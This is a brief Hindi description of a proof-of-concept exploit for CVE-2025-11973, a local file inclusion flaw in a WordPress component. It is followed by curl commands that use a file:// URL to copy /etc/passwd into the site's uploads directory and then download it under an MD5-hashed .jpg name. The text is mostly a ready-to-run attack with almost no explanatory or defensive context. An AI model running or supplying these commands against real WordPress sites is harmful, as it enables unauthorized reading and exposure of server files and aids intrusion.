
CVE-2025-11973 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो file:// प्रोटोकॉल के माध्यम से WordPress में स्थानीय फ़ाइल समावेशन (LFI) प्रदर्शित करता है, जिसमें /etc/passwd का अपलोड निर्देशिका में स्वचालित बहिर्वेशन शामिल है।
file:// के माध्यम से /etc/passwd पढ़ें और uploads में एक्सफ़िलट्रेट करेंcurl -sS -A "$UA" -X POST "$BASE/?__kds_flag=post" \
--data-urlencode "kds_password=$SECRET" \
--data-urlencode "post_title=sub1-lfi" \
--data-urlencode "__kds_feature_url=file:///etc/passwd"
HASH=$(printf 'file:///etc/passwd' | md5sum | awk '{print $1}')
curl -sS -A "$UA" "$BASE/wp-content/uploads/$YMD/${HASH}.jpg" | head -n 25